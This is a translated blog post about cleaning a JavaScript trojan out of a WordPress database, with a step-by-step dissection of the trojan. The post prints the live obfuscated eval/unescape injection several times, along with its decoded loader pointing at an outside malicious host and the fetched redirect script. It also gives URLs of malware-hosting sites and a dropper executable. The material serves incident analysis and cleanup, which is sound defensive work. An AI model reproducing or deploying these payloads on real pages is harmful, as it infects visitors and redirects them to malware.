Today my WordPress site turned out to be infected with a Trojan. Unbelievable.
Here is what happened:
While publishing an article in the evening, I suddenly thought of an improvement for WordPress: separating images and attachments from the web server. Admittedly this need is probably rare, because most WordPress sites never run into these problems: running out of space (you simply upgrade the host) and attachment downloads badly slowing down access to the site itself (the html, css and js).
But when I went into the admin backend, the content box of the Quick Post widget looked strange: by default it contained a passage of text plus some JS code. The latest draft below it showed similar JS code as well. Infected with a Trojan, most likely. Fortunately, a few days ago I had backed up the entire WordPress database in order to try out the performance of a new VPS. Lucky, it seems.
I did not deal with it right away. I jotted down the WP improvement plan, but after only a few words I felt uneasy, not knowing yet how far the damage to WP went. So I casually checked articles in the WP backend and connected to phpMyAdmin to look at the database. The preliminary assessment was not serious: I only found that the JavaScript code below had been appended to the post_content field of the articles, and there seemed to be no data loss. That is easy to handle; the database can be fixed with an UPDATE. Before doing anything, back up the entire database and keep the original "evidence". Then run the SQL attached to this article and the problem is solved. Unfortunately, another WP installed in the same database was infected too, so it was handled with the same code. What remains is that the other tables in the MySQL database have not been carefully checked; after a rough look they do not seem to carry anything. Tomorrow is Friday, then the weekend; I will check them over the weekend.
The Trojan got in through some vulnerability, but it is not yet clear where that vulnerability is. That will be checked over the weekend too.
Data backups are very important. For an automatic backup mechanism, buying a VPS and setting it up there is more suitable, since a VPS lets you easily set up scheduled tasks on the server.
While writing this article I realized that today's traffic is clearly lower than in the previous few days. The Trojan infection is one reason, and probably an important one. Before that I had assumed that all my potential visitors were preoccupied with the "salt" issue.
This is a JS Trojan. Be careful not to execute it in the browser.
<Script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
SQL to clear the Trojan (identifiers go in backticks, the string to remove in single quotes):
UPDATE `pre_posts` SET `post_content` = REPLACE(`post_content`, '<script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 72% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 3E % 3C % 2F % 22% 73% 63% 72% 70% 74% 3E % 27% 3B ")) </script> ', '');
Affected 4045 rows. (The query takes 0.8925 seconds)
-----------------------------
UPDATE `pre2_posts` SET `post_content` = REPLACE(`post_content`, '<script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 72% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 3E % 3C % 2F % 22% 73% 63% 72% 70% 74% 3E % 27% 3B ")) </script> ', '');
Affected 2174 rows. (The query takes 3.1435 seconds)
Tragedy (杯具) strikes again:
On Saturday morning I saw a message in WordPress, left on "Little tragedy: WordPress infected with a Trojan / a summary of the cleanup": "This post automatically jumps to a web page and downloads several .EXE files, which the 360 scanner detected as viruses. Here is the download information: pcupdate1__2129.exe http://www1.firstok-security.rr.nu/retkko107_2129.php?Xtev4=nNra76uj2eTZ29CRotz  I don't know whether the problem is on my browser's side or what is going on. I am using Chrome over 'scientific' internet access." It seems that when I wrote the post in the WordPress backend I was in HTML code mode rather than the visual editor, so I posted the JS Trojan straight into the page. A Trojan of my own making?! I checked the article immediately; the page was very slow. To stay safe, I disabled JavaScript in Firefox before the page finished loading (using a JS toggle plug-in). Sure enough, the Trojan was lying quietly in the HTML source, as if grinning at me. I cut out the whole HTML immediately, made a few changes, switched to the visual editor and pasted it back in. The visual editor automatically escapes the < and > in the HTML as &lt; and &gt;, so the browser no longer executes it as JS code. -- Enough rambling -- with that fixed, it is time to dissect the Trojan, which is what I wanted to do when I wrote the post the day before yesterday, except that it was already past midnight.
Thanks:
-- The message above was sent by the author of "punctuation sign555.blog.51cto.com". Thank you very much!!
Trojan anatomy:
This is a JS Trojan. Be careful not to execute it in the browser.
<Script> eval (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
Analysis: this is the step I wanted to get to while cleaning up the Trojan. The Trojan itself is a transcoded JS string: when it runs, the string is first un-transcoded (unescape) and the result is then executed as code by eval.
Create a new .html file with the following content:
<Script> document. write (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 28% 3C % 27% 73% 63% 72% 69% 70% 74% 20% 73% 72% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 6E % 68% 6D % 65% 6E % 61% 69% 75% 74% 6E % 65% 6C % 68% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
Opening it in Chrome displays the following message:
Chrome seems to be doing a good job on security here, showing a warning for a site that contains malicious code. Looking closer, the decoded code is still a piece of JS which then pulls the Trojan from a website (the usual pattern for web page Trojans), and code that document.write puts into the page may still be executed. That is not safe, even though I am on Linux, so I changed the way the output is shown.
Use an alert() box instead, so that the decoded string is displayed and not executed. Also, the text of an alert box in Fedora Linux can be selected and copied with the mouse, which is more convenient than the alert box on Windows! The code is as follows:
<Script> alert (unescape ("% 64% 6F % 63% 75% 6D % 65% 6E % 74% 2E % 77% 72% 69% 74% 65% 3C % 28% 27% 73% 63% 72% 69% 70% 74% 20% 63% 3D % 22% 68% 74% 74% 3A % 2F % 2F % 6C % 70% 65% 73% 73% 74% 68% 6E % 65% 6D % 61% 6E % 69% 75% 74% 65% 6E % 68% 6C % 65% 2E % 63% 6F % 6D % 2F % 6A % 73% 2E % 70% 68% 70% 3F % 6B % 6B % 3D % 33% 33% 22% 3E % 3C % 2F % 73% 63% 72% 69% 70% 74% 3E % 27% 29% 3B ")) </script>
Careful: this section is also a Trojan.
document.write('<script src="http://lessthenaminutehandle.com/js.php?kk=33"></script>');
The decoded string is indeed a document.write statement: it writes a piece of JS into the page's HTML document, and that JS comes from a file on an external site. It is a dynamic file (js.php); either there are many Trojans on that domain and kk=33 selects one as a parameter, or kk=33 is just a string used to count where the traffic came from.
Let's see what it is. That takes a bit of exploration spirit~~
This time we cannot use a browser: it is neither safe nor convenient. What then? The Linux terminal! Isn't wget the most convenient tool?
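The decode-without-eval step above can be scripted so it also serves the cleanup: as an added example (not the post's own code), this Python reproduces JavaScript unescape(), pulls the remote src out of the decoded loader, and strips the injected tag from post_content the way the REPLACE() statements did. The payload and the malicious.example domain are constructed stand-ins, not the real Trojan.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample, NOT the real payload: a stand-in domain replaces the one in the post.
SAMPLE_DECODED = 'document.write(\'<script src="http://malicious.example/js.php?kk=33"></script>\');'
# Percent-encode every character, which is how the injected string was obfuscated.
SAMPLE_ENCODED = "".join("%%%02X" % ord(c) for c in SAMPLE_DECODED)
SAMPLE_INJECTED = '<script>eval(unescape("%s"))</script>' % SAMPLE_ENCODED

# Matches <script>eval(unescape("..."))</script> as appended to post_content.
INJECTED_SCRIPT_RE = re.compile(
    r'<script[^>]*>\s*eval\s*\(\s*unescape\s*\(\s*"([^"]*)"\s*\)\s*\)\s*;?\s*</script>',
    re.IGNORECASE,
)


def js_unescape(s: str) -> str:
    """Decode a JavaScript unescape() string (%XX and %uXXXX) without running it."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})", repl, s)


def analyse_payload(encoded: str) -> Dict[str, str]:
    """Return the decoded loader and the remote script URL it would pull in."""
    decoded = js_unescape(encoded)
    src = re.search(r'src\s*=\s*["\']([^"\']+)["\']', decoded, re.IGNORECASE)
    return {"decoded": decoded, "remote_src": src.group(1) if src else ""}


def clean_post(content: str) -> Tuple[str, List[Dict[str, str]]]:
    """Strip every injected loader from one post_content value (like the REPLACE() above)."""
    findings = [analyse_payload(m.group(1)) for m in INJECTED_SCRIPT_RE.finditer(content)]
    return INJECTED_SCRIPT_RE.sub("", content), findings


def scan_posts(rows: List[Tuple[int, str]]) -> List[Tuple[int, str, List[Dict[str, str]]]]:
    """Process (ID, post_content) rows as read from wp_posts; report only infected ones."""
    hits = []
    for post_id, content in rows:
        cleaned, findings = clean_post(content)
        if findings:
            hits.append((post_id, cleaned, findings))
    return hits


if __name__ == "__main__":
    rows = [(1, "<p>clean post</p>"), (2, "<p>hit</p>" + SAMPLE_INJECTED)]  # constructed rows
    for post_id, cleaned, findings in scan_posts(rows):
        print(post_id, findings[0]["remote_src"], repr(cleaned))
```

Run it against rows dumped from the real posts table to get both the list of remote loaders to block and the cleaned content to write back, without ever executing the payload.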
[feng@fsc tmp]$ wget http://lessthenaminutehandle.com/js.php?kk=33
[feng@fsc tmp]$ cat js.php\?kk\=33
function ssdfsc(cefrvwerfv3rg5e, vbeal, ebtal) {
    // set cookie <name>=<value>, expiring ebtal days from now
    var ewefwe = new Date();
    var vcwc = ewefwe.getDate() + ebtal;
    ewefwe.setDate(vcwc);
    var owc3te = ewefwe.toGMTString();
    document.cookie = cefrvwerfv3rg5e + "=" + escape(vbeal) + "; expires=" + owc3te;
}
function wsdfsdd(cefrvwerfv3rg5e) {
    // return "1" if the named cookie is already present, "" otherwise
    if (document.cookie.indexOf(cefrvwerfv3rg5e + "=") != -1) return "1";
    return "";
}
if (wsdfsdd("eererfero") == "") {
    // first visit only: set a 20-day marker cookie, then redirect the top window
    ssdfsc("eererfero", "1", 20);
    var derverv = "http://www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D";
    window.top.location.replace(derverv);
}
It in turn loads something from yet another site, but I don't know what it is. In the spirit of exploration, let's have a look:
wget -O xxx.js http://www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D
I thought it would be another JavaScript file; the result was an HTML document. It is fairly large, so I won't paste it here. See the attachment:
xxx.js.html.zip: this is the Trojan file, download with caution.
In addition, the earlier JS request was sent with kk=33. Let's check whether the site hosts multiple Trojans or whether it is just a statistics parameter.
[feng@fsc tmp]$ wget http://lessthenaminutehandle.com/js.php?kk=32
--12:12:06--  http://lessthenaminutehandle.com/js.php?kk=32
Resolving host lessthenaminutehandle.com... 91.193.194.110
Connecting to lessthenaminutehandle.com|91.193.194.110|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 573 [text/html]
Saving to: "js.php?kk=32"
100%[==============================================>] 573  --.-K/s  in 0s
12:12:07 (36.2 MB/s) - saved "js.php?kk=32" [573/573]
[feng@fsc tmp]$ cat js.php\?kk\=32
// identical to the kk=33 response
function ssdfsc(cefrvwerfv3rg5e, vbeal, ebtal) {
    var ewefwe = new Date();
    var vcwc = ewefwe.getDate() + ebtal;
    ewefwe.setDate(vcwc);
    var owc3te = ewefwe.toGMTString();
    document.cookie = cefrvwerfv3rg5e + "=" + escape(vbeal) + "; expires=" + owc3te;
}
function wsdfsdd(cefrvwerfv3rg5e) {
    if (document.cookie.indexOf(cefrvwerfv3rg5e + "=") != -1) return "1";
    return "";
}
if (wsdfsdd("eererfero") == "") {
    ssdfsc("eererfero", "1", 20);
    var derverv = "http://www3.personalsecurityrn.rr.nu/?1dd9536=m%2Bzgl2uilqSsld7K0LCYienm1bHco6djpaJgo6xjlYg%3D";
    window.top.location.replace(derverv);
}
Identical. So it can basically be regarded as a statistics parameter: the Trojan planters (the "horse grooms") can count where all their horses have been scattered. These people are hateful, and there is no hacker spirit in this: hacking used for sabotage and private gain!
It seems complicated, and it is already half past twelve. If I keep reading I won't get to eat, and the spirit of exploration does not fill a stomach. Off to eat.
It suddenly occurs to me that those so-called hackers say something similar: "The hacker spirit cannot be eaten as a meal!" -- this is the most painful thing for all of mankind: "eating".
From http://blog.path8.net/archives/4201.html